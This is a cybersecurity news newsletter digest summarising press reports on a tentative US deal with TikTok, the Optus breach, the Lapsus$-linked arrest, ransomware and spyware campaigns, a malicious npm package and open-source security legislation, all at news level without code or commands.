Biden Admin Reportedly Has a Deal with TikTok to Address Some of the App's Security Concerns
TikTok tentatively faces UK fine for failing to sufficiently protect children's data, Major Optus breach creates a storm in OZ, UK arrests teen who may be behind Uber, Rockstar Games hacks, more
Metacurity is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.
In a move to alleviate some of the ever-mounting national security concerns stemming from Beijing's ability to snoop via its technology, the Biden administration and popular video app TikTok reportedly drafted a preliminary agreement to address some security concerns swirling around TikTok.
The two sides reportedly hammered out the foundations of a deal in which TikTok would change its data security and governance without requiring its owner, the Chinese internet giant ByteDance, to sell it. However, two sources with knowledge of the matter say the Justice Department is leading the negotiations with TikTok, and its number two official, Lisa Monaco, has concerns that the terms are not tough enough on China.
Indicating that a final resolution could drag on for months, two sources say that the Treasury Department is also skeptical that the potential agreement with TikTok can sufficiently resolve national security issues. TikTok has been negotiating with representatives of the Committee on Foreign Investment in the United States, or CFIUS, a group of federal agencies that reviews investments by foreign entities in American companies, to resolve concerns that the app puts national security at risk. The CFIUS would also have to sign off on an agreement. (Lauren Hirsch, David McCabe, Katie Benner, and Glenn Thrush / New York Times)
Chinese-owned video app TikTok faces a possible fine of 27 million pounds ($28.9 million) after the UK’s privacy watchdog, the Information Commissioner’s Office (ICO), provisionally found the company may have breached data protection rules by failing to protect children’s data sufficiently.
The ICO said it issued TikTok with a notice of intent, laying out its plans for a potential fine and its findings. The authority’s provisional findings include that TikTok probably failed to get the necessary parental consent from minors that use its platform and processed some data without legal grounds.
A separate probe in Ireland, the EU base of TikTok that is looking into the alleged misuse of child data by the company, is also in the final stages. (Stephanie Bodini / Bloomberg)
A hacker is demanding Australian telco Optus pay US$1 million (A$1.5 million) in cryptocurrency otherwise they will leak sensitive information about millions of Australians they claim to have obtained in a sophisticated hack.
The hacker claims to have significant data about 11.2 million Optus customers, including their names, dates of birth, phone numbers, email addresses, and, for a subset of customers, addresses and ID document numbers such as driver’s licenses or passport numbers.
Last week Optus revealed that the data of 9.8 million Australians had been breached, and the following morning, the company’s CEO, Kelly Bayer Rosmarin, made an emotional apology. The Australian Federal Police said they had launched Operation Hurricane, a global hunt to identify the hackers behind the massive Optus cyberattack.
A law firm, Slater and Gordon, announced it is investigating a class action against the telco over the data breach, and Home Affairs Minister Clare O’Neil has criticized the company for failing to stop a “basic” hack and for following up with a response that was “not adequate.” O’Neil also said the Australian government is considering stricter cybersecurity rules for telecommunications companies.
Optus disputed suggestions the hack was due to “human error” and signaled its move to offer credit monitoring was not the end of customer support and flagged an openness to reform of data rules. (Alex Turner-Cohen / News.com and Matthew Knott and Nick Bonyhady / Sydney Morning Herald) and Rod McGuirk / Associated Press)
Related: The Persian Pasdaran, NT News, DataBreachToday.com, The Guardian, ABC.net.au, ABC.net.au, Sydney Morning Herald, Daily Mail, Teiss, The Register, Channel News, IT Wire, News.com.au, The New Daily, Startup Daily, DealStreetAsia, DataBreachToday.com, PerthNow, ARN, Security News | Tech Times, gHacks, Reuters, Optus.com.au, News.com.au, ARN, Security News | Tech Times, Daily Mail, WA Today, Cyber.gov.au
Last week, UK law enforcement arrested a teenager on suspicion of hacking as part of an investigation believed to be tied to the Lapsus$ hacking group, which is suspected to be behind recent cyberattacks on Uber, Rockstar Games, and 2K.
City of London Police said the 17-year-old, from Oxfordshire, was detained as part of an inquiry supported by the UK's National Cyber Crime Unit. During previous attacks, the Lapsus$ hacking group was said to be led by a threat actor named White or BreachBase, who was doxxed as allegedly a 16-year-old teen from the UK. (BBC News and Lawrence Abrams / Bleeping Computer)
The cyber department of Ukraine's Security Service (SSU) took down a group of hackers that stole accounts of about 30 million individuals and sold them on the dark web.
The SSU says that the threat actor offered data packs purchased in bulk by pro-Kremlin propagandists, who then used the accounts to spread fake news on social media, instill panic, and cause destabilization in Ukraine and other countries. The hackers used anonymous dark web markets to sell this information and receive payments via YuMoney, Qiwi, and WebMoney, which are prohibited in Ukraine.
The number of individuals arrested remains undisclosed but are all facing criminal charges for unauthorized sale or distribution of information with limited access stored in computers and networks. These charges come with multi-year prison sentences. (Bill Toulas / Bleeping Computer)
Researchers at the University of Wisconsin-Madison discovered troubling gaps in the third-party app security model of both Slack and Teams that range from a lack of review of the apps’ code to default settings that allow any user to install an app for an entire workspace.
Even though Slack and Teams apps are limited by the permissions they seek approval for upon installation, the researchers’ survey of those safeguards found that hundreds of apps' permissions would nonetheless allow them to potentially post messages as a user, hijack the functionality of other legitimate apps, or even, in a handful of cases, access content in private channels when no such permission was granted.
Microsoft declined to comment until it could speak to the researchers, although the researchers say they communicated with Microsoft about their findings before publication. Slack says that a collection of approved apps available in its Slack App Directory receives security reviews before inclusion and is monitored for any suspicious behavior. (Andy Greenberg / Wired)
Researchers at Symantec say that the ransomware-as-a-service (RaaS) group spreading the Noberus ransomware known as Coreid is adding weapons to its malware to steal data and credentials from compromised networks.
An extensively updated version of the Exmatter data exfiltration tool was seen last month used with Noberus in ransomware infections, and at least one affiliate using Noberus was detected using Eamfo. This info-stealing malware connects to the SQL database, where a victim's Veeam backup software installation stores credentials.
Noberus, also known as BlackCat and ALPHV, is a successor to the notorious Darkside (used in the Colonial Pipeline attack) and later BlackMatter ransomware strains. (Jeff Burt / The Register)
Google’s Mandiant cybersecurity group has observed apparent coordination between pro-Russian hacking groups, ostensibly comprising patriotic citizen hackers, and cyber break-ins by Russia’s military intelligence agency or GRU.
In four instances, Mandiant says it observed hacking activity linked to the GRU in which malicious “wiper” software was installed on a victim’s network. The initial wiper software caused disruption by destroying computer systems across the organization. Following this disruption, the hacktivists published data stolen from the same organizations.
Mandiant says three pro-Russian hacktivist groups, XakNet Team, Infoccentr, and CyberArmyofRussia_Reborn, have been involved in the activity. (Robert McMillan and Dustin Volz / Wall Street Journal)
ReasonLabs exposed a massive operation that has reportedly siphoned millions of dollars from the credit cards of tens of millions of victims since its launch in 2019.
The site operators, thought to originate from Russia, operate an extensive network of bogus dating and customer support websites and use them to charge credit cards bought on the dark web. Most of the cards used in the operation belong to people in the United States, but they also bought cards from French-speaking countries.
The operation has flown under the radar by charging the cards either by using an API or manually, while the site operators are cautious not to trigger anti-fraud alarms and also to extend the time before the victim realizes the charges. They charge small amounts, use generic names that might blend with the victim's spending habits, use recurring payments with the same amount, and avoid performing test transactions. (Bill Toulas / Bleeping Computer)
Researchers at Check Point say the persecuted Chinese Muslim Uyghur community was targeted with an Android-based malware campaign for over seven years.
The Android spyware is called MobileOrder and has been used in various forms since 2015. Check Point attributed the campaign to a group they named “Scarlet Mimic.” The campaign uses spear-phishing techniques disguised in Islamic artifacts, such as books, pictures, and audio files.
Check Point was unable to tie the campaign to any specific country or group, but Palo Alto earlier said the same group had “motivations similar to the stated position of the Chinese government in relation to these targets is involved.” (Jonathan Greig / Cyberscoop)
Researchers at ReversingLabs found a malicious NPM package masquerading as the legitimate software library for Material Tailwind, indicating attempts by threat actors to distribute malicious code in open-source software repositories.
While posing as a helpful tool, the Material Tailwind npm package has an automatic post-install script engineered to download a password-protected ZIP archive file containing a Windows executable capable of running PowerShell scripts. The now-removed rogue package, named material-tailwindcss, has been downloaded 320 times to date, all of which occurred on or after September 15, 2022. (Ravie Lakshmanan / The Hacker News)
Senators Gary Peters (D-MI) and Rob Portman (R-OH), the top Democrat and Republican on the Senate Homeland Security Committee, introduced new legislation, the Securing Open Source Software Act, to protect open-source software from cyberattacks while evaluating how federal agencies throughout the government are using open source code.
Under the bill, the Cybersecurity and Infrastructure Security Agency would hire open-source experts and develop a framework to assess open-source code risks within one year. CISA would also be required to conduct annual government-wide monitoring of open-source code components and study whether its new open-source risk framework could apply to the private sector and critical infrastructure industries within two years of its publication. (Chris Riotta / FCW)